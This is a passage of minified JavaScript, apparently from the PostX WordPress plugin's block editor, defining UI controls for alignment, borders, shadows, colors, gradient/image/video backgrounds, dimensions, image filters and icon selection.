.25.11.25.25v12c0 .14-.11.25-.25.25h-2.5ZM5.25 15c0 .97.78 1.75 1.75 1.75h2.5c.97 0 1.75-.78 1.75-1.75V9c0-.97-.78-1.75-1.75-1.75H7c-.97 0-1.75.78-1.75 1.75v6Zm1.75.25a.25.25 0 0 1-.25-.25V9c0-.14.11-.25.25-.25h2.5c.14 0 .25.11.25.25v6c0 .14-.11.25-.25.25H7Z"})),alignStartR:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M3 3.25h18v1.5H3v-1.5ZM12.75 8c0-.97.78-1.75 1.75-1.75H17c.97 0 1.75.78 1.75 1.75v11c0 .97-.78 1.75-1.75 1.75h-2.5c-.97 0-1.75-.78-1.75-1.75V8Zm1.75-.25a.25.25 0 0 0-.25.25v11c0 .14.11.25.25.25H17c.14 0 .25-.11.25-.25V8a.25.25 0 0 0-.25-.25h-2.5ZM5.25 8c0-.97.78-1.75 1.75-1.75h2.5c.97 0 1.75.78 1.75 1.75v6c0 .97-.78 1.75-1.75 1.75H7c-.97 0-1.75-.78-1.75-1.75V8ZM7 7.75a.25.25 0 0 0-.25.25v6c0 .14.11.25.25.25h2.5c.14 0 .25-.11.25-.25V8a.25.25 0 0 0-.25-.25H7Z",clipRule:"evenodd"})),alignEndR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3 20.75h18v-1.5H3v1.5ZM12.75 16c0 .97.78 1.75 1.75 1.75H17c.97 0 1.75-.78 1.75-1.75V5c0-.97-.78-1.75-1.75-1.75h-2.5c-.97 0-1.75.78-1.75 1.75v11Zm1.75.25a.25.25 0 0 1-.25-.25V5c0-.14.11-.25.25-.25H17c.14 0 .25.11.25.25v11c0 .14-.11.25-.25.25h-2.5ZM5.25 16c0 .97.78 1.75 1.75 1.75h2.5c.97 0 1.75-.78 1.75-1.75v-6c0-.97-.78-1.75-1.75-1.75H7c-.97 0-1.75.78-1.75 1.75v6Zm1.75.25a.25.25 0 0 1-.25-.25v-6c0-.14.11-.25.25-.25h2.5c.14 0 .25.11.25.25v6c0 .14-.11.25-.25.25H7Z"})),alignStretchR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21 2.25H3v1.5h18v-1.5ZM21 20.25H3v1.5h18v-1.5ZM10.75 6.5c0-.69-.56-1.25-1.25-1.25h-3c-.69 0-1.25.56-1.25 1.25v11c0 .69.56 1.25 1.25 1.25h3c.69 0 1.25-.56 1.25-1.25v-11Zm-1.5.25v10.5h-2.5V6.75h2.5ZM18.75 6.5c0-.69-.56-1.25-1.25-1.25h-3c-.69 0-1.25.56-1.25 1.25v11c0 .69.56 1.25 1.25 1.25h3c.69 0 1.25-.56 1.25-1.25v-11Zm-1.5.25v10.5h-2.5V6.75h2.5Z"}))},n=e=>{const{value:t,onChange:l,alignIcons:n,options:r,responsive:s,device:p,label:c,disableJustify:u,toolbar:d,setDevice:m,inline:g}=e,y=r||(u?["left","center","right"]:["left","center","right","justify"]),b=t?s?t[p]||"":t:"",v=n||["left","center","right","justify"];return(0,o.createElement)("div",{className:`ultp-field-wrap ultp-field-alignment ${g?"ultp-align-inline":""} ${d&&"ultp-align-inline"} ${n?.length&&" ultp-row-alignment"}`},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},c&&(0,o.createElement)("label",null,c),s&&(0,o.createElement)(a.Z,{setDevice:m,device:p})),(0,o.createElement)("div",{className:"ultp-sub-field"},y.map(((e,a)=>(0,o.createElement)("span",{tabIndex:0,key:a,onClick:()=>{return o=e,void l(s?Object.assign({},t,{[p]:o}):o);var o},className:`ultp-align-button ${e==b&&"active"}`},i[v[a]],d?"Align text "+e:"")))))}},6766:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(87763),i=l(64766),n=l(26687),r=l(45009);const{__}=wp.i18n,{Dropdown:s}=wp.components,p=e=>{const{value:t,label:l,onChange:p}=e,c=!(!t||!t.openBorder),u={width:{top:0,right:0,bottom:0,left:0},type:"solid",color:"#555d66"},d=(e,l)=>{p(Object.assign({},u,t,{openBorder:1},{[e]:l}))},m=t&&t.type||"";return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-popup-control ultp-field-border"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)(s,{className:"ultp-range-control",contentClassName:"ultp-field-dropdown-content ultp-border-dropdown-content",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},c&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),d("openBorder",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:`${c&&"active "} ultp-icon-style`,onClick:()=>{t(),d("openBorder",1)},"aria-expanded":e},a.Z.border)),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup"},(0,o.createElement)("div",{className:"ultp-border-style"},["solid","dashed","dotted"].map(((e,t)=>(0,o.createElement)("span",{className:m==e?e+" active":e+" ",key:t,onClick:()=>d("type",e)})))),(0,o.createElement)(r.Z,{min:0,step:1,max:100,label:__("Border Width","ultimate-post"),value:t&&t.width||"",onChange:e=>d("width",e)}),(0,o.createElement)(n.Z,{inline:!0,label:__("Color","ultimate-post"),value:t&&t.color||"",onChange:e=>d("color",e)}))}))}},65641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(87763),i=l(64766),n=l(26687),r=l(45009),s=l(60405);const{__}=wp.i18n,{Dropdown:p,ToggleControl:c}=wp.components,u=e=>{const{value:t,label:l,onChange:c}=e,u=!(!t||!t.openShadow),d={inset:"",width:{top:4,right:3,bottom:2,left:1},color:"#555d66"},m=(e,l)=>{c(Object.assign({},d,t,{[e]:l||0}))};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-popup-control ultp-field-shadow"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content ultp-shadow-dropdown-content",className:"ultp-range-control",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},u&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),m("openShadow",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:`${u&&"active "} ultp-icon-style`,onClick:()=>{t(),m("openShadow",1)},"aria-expanded":e},a.Z.boxShadow)),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup"},(0,o.createElement)(r.Z,{label:__("Shadow","ultimate-post"),value:t.width||"",onChange:e=>m("width",e),dataLabel:["offset-x","offset-y","blur","spread"],min:0,max:100,step:1}),(0,o.createElement)(n.Z,{inline:!0,inset:!0,label:__("Color","ultimate-post"),value:t.color||"",onChange:e=>m("color",e)}),(0,o.createElement)(s.Z,{label:__("Inset","ultimate-post"),value:t.inset?1:0,onChange:e=>m("inset",e?"inset":"")}))}))}},53613:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{value:t,label:l,onChange:a,options:i}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-checkbox"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)("div",{className:"ultp-sub-field-checkbox"},i.map(((e,l)=>(0,o.createElement)("div",{key:l},(0,o.createElement)("input",{onClick:()=>(e=>{if(-1!==t.indexOf(e)){const l=t.filter((t=>t!==e));a(l)}else a(t.concat([e]))})(e.value),id:l,type:"checkbox",value:e.value,defaultChecked:-1!=t.indexOf(e.value)}),(0,o.createElement)("label",{htmlFor:l},e.label))))))}},26687:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(64766),i=l(20107),n=l(60448),r=l(83100);const{__}=wp.i18n,{ColorPicker:s,Dropdown:p,Tooltip:c}=wp.components,{Fragment:u}=wp.element,d=wp.data.select("core/editor"),{useState:m}=wp.element,g=e=>{const{label:t,value:l,onChange:g,disableClear:y,pro:b,inline:v,color2:h,presetSetting:f,value2:k=null,presetClass:w}=e,[x,T]=m(!f&&!("string"!=typeof l||!l?.includes("var(--postx_preset"))),[_,C]=m(0),E=e=>{if(!b||ultp_data.active)if(null!==k){const t=Array(2).fill(void 0);t[_]="string"==typeof e?e:"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")",g(t)}else g("string"==typeof e?e:"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")")},S=()=>{g(null!==k?Array(2).fill(""):"")},P=()=>{const e={theme:d?d.getEditorSettings().colors:[],colors:(0,n.hN)()};return(0,o.createElement)("div",{className:"ultp-preset-color"},e.colors.length>0&&(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-preset-label"},(0,o.createElement)("div",{className:"ultp-field-label"},__("PostX Color","ultimate-post")," "),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,n.je)()},(0,o.createElement)("div",{className:"ultp-field-label"},"Customize"),a.ZP?.rightAngle2)),(0,o.createElement)("div",{className:"ultp-preset-color__input"},e.colors.map(((e,t)=>(0,o.createElement)(c,{key:t,placement:"top",text:(0,n.nl)(e,"color")},(0,o.createElement)("a",{className:"color_span "+(l==e?"active":""),key:t,onClick:()=>E(e),style:{backgroundColor:e}})))))),e.theme.length>0&&(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-field-label ultp-theme-preset"},__("Theme Color","ultimate-post")),(0,o.createElement)("div",{className:"ultp-preset-color__input"},e.theme.map(((e,t)=>(0,o.createElement)(c,{key:t,placement:"top",text:e.name},(0,o.createElement)("a",{className:"color_span "+(l==e.color?"active":""),key:t,onClick:()=>E(e.color),style:{backgroundColor:e.color}})))))))},L=()=>(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-color-container "+(x?"active":"")},null!==k&&(0,o.createElement)("div",{style:{textAlign:"center",fontWeight:500,fontSize:"large"}},__(0==_?"Normal Color":"Hover Color","ultimate-post")),!f&&(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:"ultp-field-label "+(x?"active":""),onClick:()=>T(!0)},"Preset Palette"),(0,o.createElement)("div",{className:"ultp-field-label "+(x?"":"active"),onClick:()=>T(!1)},"Custom")),(0,o.createElement)("div",{className:"ultp-color-field-options"},x?(0,o.createElement)(P,null):(0,o.createElement)(s,{color:(0,n.MR)(l)?l:(0,n.hN)("colorcode",l),onChangeComplete:e=>E(e)})));return f?L():(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-color":!0,"ultp-color-inline":v,"ultp-preset-color-settings":f,"ultp-color-block":!v,"ultp-pro-field":b&&!ultp_data.active})},t&&!v&&(0,o.createElement)("span",{className:"ultp-color-label"},(0,o.createElement)("label",null,t)),v?h?L():(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-color-inline__label"},(0,o.createElement)("div",{className:"ultp-color-label__content"},v&&t&&(0,o.createElement)("label",{className:"ultp-color-label"},t),l&&(0,o.createElement)(u,null,(0,o.createElement)("span",{className:"ultp-color-preview",style:{backgroundColor:l}}),null!==k&&(0,o.createElement)("span",{className:"ultp-color-preview",style:{backgroundColor:k,marginLeft:"5px"}}))),(0,o.createElement)("div",{className:"ultp-color-label__content"},!y&&l&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:S},a.ZP?.reset_left_line),(0,o.createElement)(p,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content",className:"ultp-range-control",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(0)},style:{background:l}}),renderContent:()=>L()}),null!==k&&(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content",focusOnMount:!0,className:"ultp-range-control",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(1)},style:{background:k,marginLeft:"10px"}}),renderContent:()=>L()})))):(0,o.createElement)("div",{className:"ultp-sub-field"},t&&(0,o.createElement)("span",{className:"ultp-color-label"},!y&&l&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:S},a.ZP?.reset_left_line)),(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-field-dropdown-content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(0)},style:{background:l}}),renderContent:()=>L()}),null!==k&&(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content",className:"ultp-range-control",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(1)},style:{background:k,marginLeft:"10px"}}),renderContent:()=>L()})),b&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id,"#pricing"),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))))}},47484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(64766),i=l(20107),n=l(60448),r=l(83100),s=l(26687),p=(l(77567),l(21525));l(22217);const{__}=wp.i18n,{Dropdown:c,GradientPicker:u,TextControl:d,ToggleControl:m,SelectControl:g,FocalPointPicker:y,Tooltip:b}=wp.components,{MediaUpload:v}=wp.blockEditor,h=wp.data.select("core/editor"),{useState:f}=wp.element,k=()=>(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))),w=e=>{const{value:t,label:l,pro:r,onChange:w,image:x,video:T,extraClass:_,customGradient:C,gbbodyBackground:E,inline:S}=e,P={openColor:0,type:"color",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},[L,I]=f(!("string"!=typeof t.gradient||!t.gradient?.includes("var(--postx_preset"))),B=(0,n._n)();let U=(0,n.MR)(t.gradient)?t.gradient:(0,n._n)("colorcode",t.gradient);"string"==typeof U&&(U?.includes("postx_preset_Primary_color")||U.includes("postx_preset_Secondary_color"))&&(U=U.replace("var(--postx_preset_Primary_color)",(0,n.hN)("colorcode","var(--postx_preset_Primary_color)")).replace("var(--postx_preset_Secondary_color)",(0,n.hN)("colorcode","var(--postx_preset_Secondary_color)")));const M=(e,l)=>{if(r&&!ultp_data.active)return;const o=t;"object"==typeof o.gradient&&(o.gradient=A(o.gradient)),w(Object.assign({},P,o,{openColor:1},{[l]:e}))},A=e=>"object"==typeof e?"linear"==e.type?"linear-gradient("+e.direction+"deg, "+e.color1+" "+e.start+"%, "+e.color2+" "+e.stop+"%)":"radial-gradient( circle at "+e.radial+" , "+e.color1+" "+e.start+"%,"+e.color2+" "+e.stop+"%)":e||{},H=()=>(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{M(0,"openColor")}},a.ZP?.reset_left_line);return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-color2":!0,"ultp-pro-field":r&&!ultp_data.active,"ultp-field-video-image":T||x,"ultp-inline-color2":S,"ultp-label-space":l})},l&&(0,o.createElement)("label",null,l,t.openColor&&T?H():(0,o.createElement)(o.Fragment,null)),(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)("div",{className:"ultp-color2-btn__group"},(0,o.createElement)(c,{contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"color"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("color","type")}},__("Solid","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:(0,i.Z)({"ultp-popup-color-preset-content":E})},(0,o.createElement)(s.Z,{label:"Color",inline:!0,color2:!0,disableClear:!0,value:t.color||"#16d03e",onChange:e=>{M(e,"color")}}))}),(0,o.createElement)(c,{contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"gradient"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("gradient","type")}},__("Gradient","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:(0,i.Z)({"ultp-popup-select ultp-common-popup ultp-color-container":!0,"typo-active":L,"preset-active":L||E,extraClass:!0})},(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-wrap ultp-color-field-tab"},(0,o.createElement)("div",{className:"ultp-field-label "+(L?"active":""),onClick:()=>I(!0)},"Preset Palette"),(0,o.createElement)("div",{className:"ultp-field-label "+(L?"":"active"),onClick:()=>I(!1)},"Custom")),(0,o.createElement)("div",{className:"ultp-color-field-options"},L?(0,o.createElement)(o.Fragment,null,B.length>0&&(0,o.createElement)("div",{className:"ultp-preset-gradient-options"},(0,o.createElement)("div",{className:"ultp-preset-label"},(0,o.createElement)("div",{className:"ultp-preset-label-content"}," ",__("PostX Gradient","ultimate-post")," "),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,n.je)()}," ","Customize  >")),(0,o.createElement)("div",{className:"gradient-lists"},B.map(((e,l)=>(0,o.createElement)(b,{key:l,placement:"top",text:(0,n.nl)(e,"gradient")},(0,o.createElement)("span",{className:t.gradient==e?"active":"",key:l,onClick:()=>M(e,"gradient"),style:{background:e}}))))))):(0,o.createElement)(o.Fragment,null,(0,o.createElement)(u,{clearable:!0,__nextHasNoMargin:!0,value:"object"==typeof U?A(U):U,onChange:e=>M(e,"gradient"),gradients:C.length?C:h?h.getEditorSettings().gradients:[]})))))}),x&&(0,o.createElement)(c,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"image"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("image","type")}},__("Image","ultimate-post"))),renderContent:()=>{var e;return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-image-control--popup ultp-common-popup":!0,"preset-active":L||E})},(0,o.createElement)(v,{onSelect:e=>{e.url&&M(e.url,"image")},allowedTypes:["image"],value:t.image||"",render:({open:e})=>(0,o.createElement)("div",{className:"ultp-field-media"},(0,o.createElement)("span",{className:"ultp-media-image-item"},t.image?(0,o.createElement)("div",{className:"ultp-imgvalue-wrap"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",value:t.image,placeholder:"Image Url",onChange:e=>M(e.target.value,"image")}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>M("","image")})):(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",placeholder:"Image Url",onChange:e=>M(e.target.value,"image")}),(0,o.createElement)("div",{className:"ultp-placeholder-image"},t.image?(0,o.createElement)("div",{className:"ultp-focalpoint-wrapper"},(0,o.createElement)(y,{url:t.image,value:t.position,onDragStart:e=>M(e,"position"),onDrag:e=>M(e,"position"),onChange:e=>M(e,"position")})):(0,o.createElement)("span",{onClick:e,className:"dashicons dashicons-plus-alt2 ultp-media-upload"}))))}),(0,o.createElement)("div",{className:"ultp-popup-select"},(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Attachment","ultimate-post"),value:t.attachment,options:[{label:"Default",value:""},{label:"Scroll",value:"scroll"},{label:"fixed",value:"Fixed"}],onChange:e=>M(e,"attachment")}),(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Repeat","ultimate-post"),value:t.repeat,options:[{label:"Default",value:""},{label:"No-repeat",value:"no-repeat"},{label:"Repeat",value:"repeat"},{label:"Repeat-x",value:"repeat-x"},{label:"Repeat-y",value:"repeat-y"}],onChange:e=>M(e,"repeat")}),(0,o.createElement)(g,{__nextHasNoMarginBottom:!0,label:__("Size","ultimate-post"),value:t.size,options:[{label:"Default",value:""},{label:"Auto",value:"auto"},{label:"Cover",value:"cover"},{label:"Contain",value:"contain"}],onChange:e=>M(e,"size")})),(0,o.createElement)(s.Z,{label:"Fallback Color",value:null!==(e=t.fallbackColor)&&void 0!==e?e:t.color,onChange:e=>{M(e,"fallbackColor")}}),E&&!1)}}),T&&(0,o.createElement)(c,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content ultp-color2-dropdown-content",renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("div",{className:"ultp-button-group"},(0,o.createElement)("button",{className:"video"==t.type&&t.openColor?"active":"",onClick:()=>{e(),M("video","type")}},__("Video","ultimate-post"))),renderContent:()=>(0,o.createElement)("div",{className:"ultp-popup-select ultp-common-popup"},(0,o.createElement)(d,{__nextHasNoMarginBottom:!0,value:t.video,placeholder:__("Only Youtube & Vimeo  & Self Hosted Url","ultimate-post"),label:__("Video URL","ultimate-post"),onChange:e=>M(e,"video")}),(0,o.createElement)(p.Z,{value:t.start||0,min:1,max:12e3,step:1,label:__("Start Time(Seconds)","ultimate-post"),onChange:e=>M(e,"start")}),(0,o.createElement)(p.Z,{value:t.end||"",min:1,max:12e3,step:1,label:__("End Time(Seconds)","ultimate-post"),onChange:e=>M(e,"end")}),(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)(m,{__nextHasNoMarginBottom:!0,label:__("Loop Video","ultimate-post"),checked:t.loop?1:0,onChange:e=>M(e,"loop")})),(0,o.createElement)(v,{onSelect:e=>{e.url&&M(e.url,"fallback")},allowedTypes:["image"],value:t.fallback||"",render:({open:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-media"},(0,o.createElement)("label",{className:"ultp-field-label"},__("Video Fallback Image","ultimate-post")),(0,o.createElement)("span",{className:"ultp-media-image-item"},t.fallback&&(0,o.createElement)("input",{className:"ultp-text-input-control",type:"text",value:t.fallback,onChange:e=>changeUrl(e)}),(0,o.createElement)("div",{className:"ultp-placeholder-image"},t.fallback?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("img",{src:t.fallback,alt:"Fallback Image"}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>M("","fallback")})):(0,o.createElement)("span",{onClick:e,className:"dashicons dashicons-plus-alt2 ultp-media-upload"})))))}))})),t.openColor&&!T?H():(0,o.createElement)(o.Fragment,null)),r&&!ultp_data.active&&(0,o.createElement)(k,null))}},45009:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(56834),n=l(58421);const{useState:r}=wp.element,s=e=>{var t;const{responsive:l,value:s,onChange:p,device:c,label:u,setDevice:d,unit:m,noLock:g,dataLabel:y}=e,[b,v]=r(null!==(t=s?.isLocked)&&void 0!==t&&t),h=e=>"object"==typeof s&&Object.keys(s).length>0?e?l?s[c]&&s[c][e]||"":s[e]:l?s[c]||"":s:"",f=(e,t)=>{let o=b&&"unit"!=t?{top:e,right:e,bottom:e,left:e}:{[t]:e};o=Object.assign({},l?s[c]||{}:s,o),o.unit=o.unit||"px";const a=Object.assign({},s,l?{[c]:o}:o,{isLocked:b});p(a)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-dimension","data-label":u},(u||l)&&(0,o.createElement)("div",{className:"ultp-label-control"},u&&(0,o.createElement)("label",null,u),l&&(0,o.createElement)(i.Z,{setDevice:d,device:c}),m&&(0,o.createElement)(n.Z,{unit:m,value:s?l?s[c]&&s[c].unit?s[c].unit:"px":s.unit||"px":"px",setSettings:f})),(0,o.createElement)("div",{className:"ultp-dimension-input"+(g?"":" ultp-base-control-hasLock")},["top","right","bottom","left"].map(((e,t)=>(0,o.createElement)("span",{key:t,className:`ultp-${e}-dimension`},(0,o.createElement)("div",{className:"ultp-dimension-input-inner"},(0,o.createElement)("input",{type:"number",value:h(e),onChange:t=>f(t.target.value,e)}),(0,o.createElement)("span",{className:`ultp-dimension-sign ultp-dimension-position-${e}`})),(0,o.createElement)("span",{className:"ultp-dimension-label"},y?y[t]:e)))),!g&&(0,o.createElement)("button",{className:b?"active ":"",onClick:()=>v(!b)},b?(0,o.createElement)("div",null,a.ZP.link):(0,o.createElement)("div",null,a.ZP.unlink))))}},61187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{label:t}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-divider"},t&&(0,o.createElement)("div",{className:"ultp-field-label"},t),(0,o.createElement)("hr",null))}},77567:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(87763);const{__}=wp.i18n,{Dropdown:i}=wp.components,n=[{key:"hue",label:__("Hue","ultimate-post")},{key:"saturation",label:__("Saturation","ultimate-post")},{key:"brightness",min:0,max:200,label:__("Brightness","ultimate-post")},{key:"contrast",min:0,max:200,label:__("Contrast","ultimate-post")},{key:"invert",label:__("Invert","ultimate-post")},{key:"blur",min:0,max:50,label:__("Blur","ultimate-post")}],r=({value:e,label:t,onChange:l})=>{const r=!(!e||!e.openFilter),s=t=>e?.hasOwnProperty(t)?e[t]:"",p=(t,o)=>{l(Object.assign({},e,{[o]:t}))};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-imgfilter"},t&&(0,o.createElement)("label",null,t),(0,o.createElement)(i,{className:"ultp-range-control",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},(0,o.createElement)("div",{className:"ultp-typo-control"},r&&(0,o.createElement)("div",{className:"active ultp-base-control-btn dashicons dashicons-image-rotate",onClick:()=>{e&&t(),p(0,"openFilter")}}),(0,o.createElement)("div",{className:`${r&&"active "} ultp-icon-style`,onClick:()=>{t(),p(1,"openFilter")}},a.Z.setting))),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-imgfilter-range"},n.map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-range-input"},(0,o.createElement)("span",null,e.label),(0,o.createElement)("input",{type:"range",min:e.min||0,max:e.max||100,value:s(e.key),step:1,onChange:t=>p(t.target.value,e.key)}),(0,o.createElement)("input",{type:"number",min:e.min||0,max:e.max||100,value:s(e.key),step:1,onChange:t=>p(t.target.value,e.key)})))))}))}},68477:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(20107);const{Button:i,ButtonGroup:n}=wp.components,r=e=>{const{value:t,options:l,label:r,justify:s,disabled:p,onChange:c,inline:u}=e;return(0,o.createElement)("div",{className:(0,a.Z)({"ultp-field-wrap ultp-field-groupbutton":!0,"ultp-gbinline":u,"ultp-label-space":r})},r&&(0,o.createElement)("label",null,r),(0,o.createElement)("div",{className:"ultp-sub-field "+(s?"ultp-groupbtn-justify":"")},(0,o.createElement)(n,null,l.map(((e,l)=>(0,o.createElement)(i,{key:l,isSmall:!0,variant:e.value==t?"primary":"",onClick:()=>{return l=e.value,void c(p&&t==l?"":l);var l}},e.label))))))}},41557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(64766);const{Tooltip:i}=wp.components,{__}=wp.i18n,{Dropdown:n}=wp.components,{useState:r,useEffect:s}=wp.element,p=({value:e,label:t,onChange:l,inline:p,isSocial:c,dynamicClass:u,selection:d,hideFilter:m,help:g})=>{const[y,b]=r(""),[v,h]=r(""),[f,k]=r(c?{...a.dX}:{...a.ZP});s((()=>{!c&&y&&k(a._Y)}),[y]),s((()=>{d&&d.length&&k(Object.fromEntries(Object.entries(f).filter((([e])=>d?.includes(e)))))}),[d?.length]);const w=()=>{let e=Object.keys(f);return y&&(e=e.filter((e=>e.includes(y.toLowerCase())))),v&&(e=e.filter((e=>e.includes(v)))),e};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-icons"},t&&!p&&(0,o.createElement)("label",null,t),!p&&(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(n,{popoverProps:{placement:"bottom-start"},className:"",renderToggle:({onToggle:t,onClose:a})=>(0,o.createElement)("div",{className:"ultp-icon-input"},e&&f[e]&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{onClick:()=>t()},f[e]),(0,o.createElement)("div",{className:"ultp-icon-close",onClick:()=>l("")})),(0,o.createElement)("span",{onClick:()=>t()})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-sub-dropdown ultp-icondropdown-container"},(0,o.createElement)("div",{className:"ultp-search-icon"},(0,o.createElement)("input",{type:"text",placeholder:"Search Icons",onChange:e=>b(e.target.value)})),!m&&(0,o.createElement)("div",{className:"ultp-searchIcon-filter"},__("Icon Type Name","ultimate-post"),(0,o.createElement)("select",{onChange:e=>h(e.target.value)},(0,o.createElement)("option",{selected:!0,value:""},__("Show All Icon","ultimate-post")),(0,o.createElement)("option",{value:"solid"},__("Solid 